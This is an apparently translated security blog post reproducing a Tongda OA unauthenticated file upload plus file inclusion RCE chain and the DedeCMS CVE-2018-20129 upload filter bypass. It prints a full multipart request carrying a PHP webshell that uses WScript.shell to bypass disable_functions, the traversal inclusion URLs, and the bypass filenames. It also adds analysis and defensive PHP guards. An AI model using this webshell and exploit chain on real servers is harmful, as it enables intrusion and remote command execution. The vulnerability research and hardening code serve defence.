Tag: 任意文件上传 (arbitrary file upload)


Tongda OA file upload and file inclusion vulnerabilities: reproduction and analysis

0x00 Overview

On 2020-03-17, reports surfaced that a Tongda OA 0day was being exploited to deploy ransomware; the vendor has released a patch. The 0day chains a file upload with a file inclusion to achieve RCE and requires no authentication.

0x01 Affected versions

2013, 2013 Enhanced, 2015, 2016, 2017, v11 // only the v11 (2020) patch was seen to include a fix for gateway.php (the file inclusion vulnerability)

0x02 Reproduction

Using v11:

File inclusion vulnerability

http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log

File upload vulnerability

Uploaded files are stored outside the web root, e.g. "D:\MYOA\attach\im\2003\ddd.test.jpg". Request:

POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 633
Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5

--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="P"

x
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="UPLOAD_MODE"

1
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="DEST_UID"

1
--ee65cd98fdbee896acd30a7b2552b6b5
Content-Disposition: form-data; name="ATTACHMENT"; filename="test07.jpg"
Content-Type: image/jpeg

<?php
$command = $_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
--ee65cd98fdbee896acd30a7b2552b6b5--

Then execute the PHP code through the file inclusion:

json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F1941158481.test07.jpg%22%7D&cmd=whoami

This form of inclusion also works:

http://127.0.0.1/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../attach/im/2003/1044529275.test09.jpg

// In testing, phpinfo(); could not be executed directly; the Windows COM component is used to get around disable_functions:

<?php
$command = $_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

0x03 Remediation

Apply the patch.

0x04 Analysis

The PHP files are Zend 5.4 encoded; decrypt them first.

File upload vulnerability analysis, upload.php:5:

$P = $_POST['P'];
if (isset($P) || $P != '') {
    // a non-empty P skips auth.php entirely and only seeds the session id
    ob_start();
    include_once 'inc/session.php';
    session_id($P);
    session_start();
    session_write_close();
} else {
    include_once './auth.php';
}

The P parameter must be present, otherwise execution goes through the auth.php login check; any non-empty value will do.

$DEST_UID = $_POST['DEST_UID'];
$dataBack = array();
if ($DEST_UID != '' && !td_verify_ids($ids)) {
    $dataBack = array('status' => 0, 'content' => '-ERR ' . _('接收方ID无效'));
    echo json_encode(data2utf8($dataBack));
    exit;
……
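The inclusion step above works because a request parameter is handed to include with nothing tying it to a directory. The following is an added example, not Tongda's code and not the vendor's patch (the page does not show what the patch changed): a guard that resolves the requested path with realpath() and only allows a .php file that stays under an allow-listed base directory. The directory names and files it creates under the system temp directory are constructed for the demo; the file names mirror the ones mentioned in the reproduction.

```php
<?php
// Added example (not Tongda OA code). Demonstrates an include-path guard
// against directory traversal: resolve the candidate, then require it to
// be a .php file inside the allow-listed base directory.

function resolve_include_target(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                                  // base itself is missing
    }
    // realpath() rejects NUL bytes with a ValueError on PHP 8, so refuse them first.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false) {
        return null;                                  // target does not exist
    }
    // Prefix check with a trailing separator so "/app/public" cannot be
    // satisfied by "/app/public_old/..."; "../" segments have already been
    // collapsed by realpath(), so an escape shows up as a different prefix.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Only server-side code belongs in an include; uploads and logs never do.
    if (strtolower(pathinfo($candidate, PATHINFO_EXTENSION)) !== 'php') {
        return null;
    }
    return $candidate;
}

// --- demo tree (constructed) -------------------------------------------
$root = sys_get_temp_dir() . '/include_guard_demo_' . getmypid();
mkdir("$root/public/pages", 0700, true);
mkdir("$root/attach/im/2003", 0700, true);
mkdir("$root/nginx/logs", 0700, true);
file_put_contents("$root/public/pages/home.php", "<?php echo 'home';");
file_put_contents("$root/attach/im/2003/1941158481.test07.jpg", "constructed upload");
file_put_contents("$root/nginx/logs/oa.access.log", "127.0.0.1 - - \"GET / HTTP/1.1\" 200");

$requests = [
    'pages/home.php',                                 // legitimate include
    '../attach/im/2003/1941158481.test07.jpg',        // upload directory, outside base
    '../nginx/logs/oa.access.log',                    // log file, outside base
    "pages/home.php\0.jpg",                           // NUL-byte truncation attempt
];
foreach ($requests as $r) {
    $target = resolve_include_target("$root/public", $r);
    printf("%-45s => %s\n", addcslashes($r, "\0"), $target ?? 'refused');
}

// --- cleanup ------------------------------------------------------------
foreach (["$root/public/pages/home.php",
          "$root/attach/im/2003/1941158481.test07.jpg",
          "$root/nginx/logs/oa.access.log"] as $f) {
    unlink($f);
}
foreach (["$root/public/pages", "$root/public", "$root/attach/im/2003", "$root/attach/im",
          "$root/attach", "$root/nginx/logs", "$root/nginx", $root] as $d) {
    rmdir($d);
}
```

Only the first request resolves to a path; the two traversal requests resolve outside the base directory and are refused before the extension is even considered, and the NUL-byte request is refused before realpath() runs. The extension check is the second line of defence: even a file that lands under the base directory is not includable unless it is a .php file placed there by deployment, which is what separates "files the application serves" from "files the application executes".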

DedeCMS RCE CVE-2018-20129 reproduction

An old vulnerability of limited practical value; for detailed analysis see:

https://www.anquanke.com/post/id/168458
https://xz.aliyun.com/t/1976
https://www.jianshu.com/p/b0eb694be4ac

Rough principle: with an administrator logged in and the member feature enabled, the editor's image upload filter is lax. A regex replaces characters such as %, *, ? with the empty string, which can be used to bypass the filter (e.g. zxc.jpg.p%hp, zxc.jpg?ph%p, zxc.jpg.p?hp). // Reportedly a specially crafted image webshell is needed so that re-rendering does not break it, but as far as I recall I just uploaded an ordinary image webshell and it worked……

Vulnerable file: select_images_post.php

Key code:

<?php
/**
 * Image selection
 *
 * @version $Id: select_images_post.php 1 9:43 2010年7月8日Z tianya $
 * @package DedeCMS.Dialog
 * @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
 * @license http://help.dedecms.com/usersguide/license.html
 * @link http://www.dedecms.com
 */
require_once(dirname(__FILE__)."/config.php");
require_once(dirname(__FILE__)."/../image.func.php");
if(empty($activepath))
{
    $activepath = '';
    $activepath = str_replace('.', '', $activepath);
    $activepath = preg_replace("#\/{1,}#", '/', $activepath);
    if(strlen($activepath) < strlen($cfg_image_dir))
    {
        $activepath = $cfg_image_dir;
    }
}
if(empty($imgfile))
{
    $imgfile = '';
}
if(!is_uploaded_file($imgfile))
{
    ShowMsg("你没有选择上传的文件!".$imgfile, "-1");
    exit();
}
$CKEditorFuncNum = (isset($CKEditorFuncNum))? $CKEditorFuncNum : 1;
// strips % * ? and friends out of the name instead of rejecting it
$imgfile_name = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $imgfile_name));
// unanchored: an allowed extension anywhere in the name satisfies the check
if(!preg_match("#\.(".$cfg_imgtype.")#i", $imgfile_name))
{
    ShowMsg("你所上传的图片类型不在许可列表,请更改系统对扩展名限定的配置!", "-1");
    exit();
}
$nowtme = time();
$sparr = Array("image/pjpeg", "image/jpeg", "image/gif", "image/png", "image/xpng", "image/wbmp");
$imgfile_type = strtolower(trim($imgfile_type));
if(!in_array($imgfile_type, $sparr))
{
    ShowMsg("上传的图片格式错误,请使用JPEG、GIF、PNG、WBMP格式的其中一种!", "-1");
    exit();
}
$mdir = MyDate($cfg_addon_savetype, $nowtme);
if(!is_dir($cfg_basedir.$activepath."/$mdir"))
{
    MkdirAll($cfg_basedir.$activepath."/$mdir", $cfg_dir_purview);
    CloseFtp();
}
$filename_name = $cuserLogin->getUserID().'-'.dd2char(MyDate("ymdHis", $nowtme).mt_rand(100,999));
$filename = $mdir.'/'.$filename_name;
$fs = explode('.', $imgfile_name);
// the stored extension is the last segment of the stripped name, which was never validated
$filename = $filename.'.'.$fs[count($fs)-1];
$filename_name = $filename_name.'.'.$fs[count($fs)-1];
$fullfilename = $cfg_basedir.$activepath."/".$filename;
move_uploaded_file($imgfile, $fullfilename) or die("上传文件到 $fullfilename 失败!");
if($cfg_remote_site=='Y' && $remoteuploads == 1)
{
    // work out the remote file path
    $remotefile = str_replace(DEDEROOT, '', $fullfilename);
    $localfile = '../..'.$remotefile;
    // create the remote directory……
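The filter above fails for two independent reasons: the blacklist regex sanitises the name rather than rejecting it, and the extension check is unanchored, so it is satisfied by ".jpg" appearing anywhere while the stored extension is taken from the last segment unchecked. The following added example (not DedeCMS code) rebuilds that decision in a standalone function and places it next to a strict allow-list check on the final extension. The value of $cfg_imgtype is assumed; the sample names are the ones discussed above.

```php
<?php
// Added example (not DedeCMS code). Contrasts the quoted filename filter
// with an allow-list check on the final extension.

$cfg_imgtype = 'jpg|gif|png';   // assumed value for the demo

/**
 * The original decision, rebuilt from the quoted code: strip blacklisted
 * characters, then require an allowed extension ANYWHERE in the name.
 * Returns the extension the file would be stored with, or null if rejected.
 */
function original_accepts(string $name, string $cfg_imgtype): ?string
{
    $name = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $name));
    if (!preg_match("#\.(" . $cfg_imgtype . ")#i", $name)) {
        return null;
    }
    $fs = explode('.', $name);
    return $fs[count($fs) - 1];     // last segment, never validated
}

/**
 * Hardened decision: after the same stripping, the FINAL extension must be
 * in the allow-list, compared case-insensitively and exactly. The value
 * returned (and therefore stored) is the allow-listed entry itself.
 */
function hardened_accepts(string $name, string $cfg_imgtype): ?string
{
    $name = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $name));
    $allowed = explode('|', strtolower($cfg_imgtype));
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $allowed, true)) {
        return null;
    }
    return $ext;
}

// Sample names: one legitimate upload, the three bypass forms quoted in the
// write-up, and a plain .php for comparison.
$samples = ['photo.jpg', 'zxc.jpg.p%hp', 'zxc.jpg?ph%p', 'zxc.jpg.p?hp', 'shell.php'];
printf("%-14s %-18s %s\n", 'name', 'original stores', 'hardened stores');
foreach ($samples as $s) {
    printf("%-14s %-18s %s\n", $s,
        original_accepts($s, $cfg_imgtype) ?? 'reject',
        hardened_accepts($s, $cfg_imgtype) ?? 'reject');
}
```

Two details carry the fix. First, the decision is made on the final extension rather than on "an allowed extension exists somewhere", so zxc.jpg.php (what zxc.jpg.p%hp becomes after stripping) fails because its final extension is php. Second, the name the file is stored under is derived from the allow-listed entry, not from the user-supplied segment, so a check that passed cannot be paired with a different stored extension. Stripping characters is kept only to show the contrast; rejecting a name that contains them is the cleaner choice, since sanitising input changes it into something the rest of the checks never saw.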